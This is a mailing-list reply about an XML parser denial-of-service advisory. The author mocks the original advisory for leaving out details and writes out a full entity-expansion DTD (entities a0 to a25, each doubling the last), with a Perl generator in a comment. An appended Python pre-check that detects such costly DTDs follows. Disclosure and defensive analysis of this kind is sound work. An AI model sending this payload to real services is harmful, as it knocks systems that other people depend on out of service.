From: greg-fulldisclosure at nest.cx (Gregory Steuck)
Subject: Re: Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD

>>>>> "Amit" == Amit Klein <Amit.Klein@...ctumInc.com> writes:

    Amit> Multiple vendors XML parser (and SOAP/WebServices server)
    Amit> Denial of Service attack using DTD

Nice work SanctumInc! Great piece of non-disclosure! It's posts like
this one that make Bugtraq a cheap brand name peddling place.

    Amit>  - Other products from other vendors are known to be
    Amit> vulnerable too

Perfect, and since we are not told what the vulnerability is, we are
left vulnerable without any way to find out where the problem lies.

Fortunately, it doesn't take a rocket scientist to devise a DTD that
takes exponential time to process without consuming a lot of memory.
Did you have this one in mind?

<?xml version="1.0"?>

<!-- 
for ($i=1; $i < $ARGV[0]; $i++) {
 $j = $i - 1;
 print <<EOF;
<!ENTITY a$i "&a$j;&a$j;">
EOF
}
-->

<!DOCTYPE a [
<!ENTITY a0 "">
<!ENTITY a1 "&a0;&a0;">
<!ENTITY a2 "&a1;&a1;">
<!ENTITY a3 "&a2;&a2;">
<!ENTITY a4 "&a3;&a3;">
<!ENTITY a5 "&a4;&a4;">
<!ENTITY a6 "&a5;&a5;">
<!ENTITY a7 "&a6;&a6;">
<!ENTITY a8 "&a7;&a7;">
<!ENTITY a9 "&a8;&a8;">
<!ENTITY a10 "&a9;&a9;">
<!ENTITY a11 "&a10;&a10;">
<!ENTITY a12 "&a11;&a11;">
<!ENTITY a13 "&a12;&a12;">
<!ENTITY a14 "&a13;&a13;">
<!ENTITY a15 "&a14;&a14;">
<!ENTITY a16 "&a15;&a15;">
<!ENTITY a17 "&a16;&a16;">
<!ENTITY a18 "&a17;&a17;">
<!ENTITY a19 "&a18;&a18;">
<!ENTITY a20 "&a19;&a19;">
<!ENTITY a21 "&a20;&a20;">
<!ENTITY a22 "&a21;&a21;">
<!ENTITY a23 "&a22;&a22;">
<!ENTITY a24 "&a23;&a23;">
<!ENTITY a25 "&a24;&a24;">
]>

<a>&a0;</a>

Uh-oh, turns out it's the way DTD is supposed to work, not an
implementation defect.
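As an added example (not part of this post or of any vendor's code), here is a defender-side pre-check in Python that reads the internal DTD subset and computes the cost of each entity from the declarations alone, without expanding anything. It counts two things: the number of bytes an entity expands to, and the number of reference expansions a parser would have to perform. The second number is what catches the DTD above, where every entity expands to the empty string, so a byte limit would never trip, yet a25 still costs 2^26 - 2 expansions. The regexes, thresholds and function names are my own assumptions, and the check only understands double-quoted internal general entities (no parameter or external entities).

```python
import re

# Constructed sample: the same doubling DTD as the post, regenerated for
# a chosen depth (the post shows depth 25).
def build_doubling_dtd(depth):
    decls = ['<!ENTITY a0 "">']
    for i in range(1, depth + 1):
        decls.append(f'<!ENTITY a{i} "&a{i-1};&a{i-1};">')
    return "<!DOCTYPE a [\n" + "\n".join(decls) + "\n]>"

SAMPLE_DOC = '<?xml version="1.0"?>\n' + build_doubling_dtd(25) + "\n<a>&a0;</a>\n"

# Assumed, simplified grammar: double-quoted internal general entities only.
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
GENERAL_REF = re.compile(r'&(\w+);')
INTERNAL_SUBSET = re.compile(r'<!DOCTYPE[^\[>]*\[(.*?)\]\s*>', re.DOTALL)
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}  # bytes each


def parse_internal_entities(doc):
    """Return {name: replacement_text} for the internal DTD subset, if any."""
    m = INTERNAL_SUBSET.search(doc)
    return dict(ENTITY_DECL.findall(m.group(1))) if m else {}


def expansion_costs(entities):
    """Map each entity name to (expanded_bytes, reference_expansions).

    Walks the declaration graph once per entity with memoisation, so the
    cost of a25 is computed in 25 steps even though expanding it would
    take 2**26 - 2 reference lookups.  Raises ValueError on a cycle,
    which the XML spec forbids but a naive parser may still chase."""
    costs = {}

    def visit(name, stack):
        if name in costs:
            return costs[name]
        if name in stack:
            raise ValueError(f"recursive entity reference: {name}")
        stack.add(name)
        value = entities[name]
        length = len(GENERAL_REF.sub("", value))  # literal text only
        refs = 0
        for ref in GENERAL_REF.findall(value):
            refs += 1
            if ref in entities:
                sub_len, sub_refs = visit(ref, stack)
                length += sub_len
                refs += sub_refs
            else:
                length += PREDEFINED.get(ref, 0)  # undeclared: count nothing
        stack.discard(name)
        costs[name] = (length, refs)
        return costs[name]

    for name in entities:
        visit(name, set())
    return costs


def document_cost(doc):
    """Total (bytes, reference_expansions) for the element content of doc."""
    costs = expansion_costs(parse_internal_entities(doc))
    body = INTERNAL_SUBSET.sub("", doc)  # only references outside the DTD count
    total_len, total_refs = 0, 0
    for ref in GENERAL_REF.findall(body):
        total_refs += 1
        if ref in costs:
            sub_len, sub_refs = costs[ref]
            total_len += sub_len
            total_refs += sub_refs
        else:
            total_len += PREDEFINED.get(ref, 0)
    return total_len, total_refs


def is_safe(doc, max_refs=10_000, max_bytes=1_000_000):
    """Decide, before invoking a real parser, whether doc is cheap enough.
    The limits are assumed defaults; tune them to the documents you expect."""
    try:
        length, refs = document_cost(doc)
    except ValueError:  # entity cycle
        return False
    return refs <= max_refs and length <= max_bytes


if __name__ == "__main__":
    print("a25 costs (bytes, expansions):",
          expansion_costs(parse_internal_entities(SAMPLE_DOC))["a25"])
    print("sample document as posted:", document_cost(SAMPLE_DOC), is_safe(SAMPLE_DOC))
```

The memoised walk is the whole point: a parser that expands references one at a time pays for every one of the 2^26 - 2 lookups, whereas summing costs over the declaration graph is linear in the number of declarations. In practice this kind of pre-check belongs in front of a parser that does not already enforce its own entity-expansion limits, or it is simply replaced by enabling those limits.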
